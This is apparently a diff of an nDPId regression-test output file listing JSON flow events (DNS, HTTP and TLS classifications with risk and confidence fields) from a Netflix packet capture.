-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00648{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","total-events-serialized":406}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
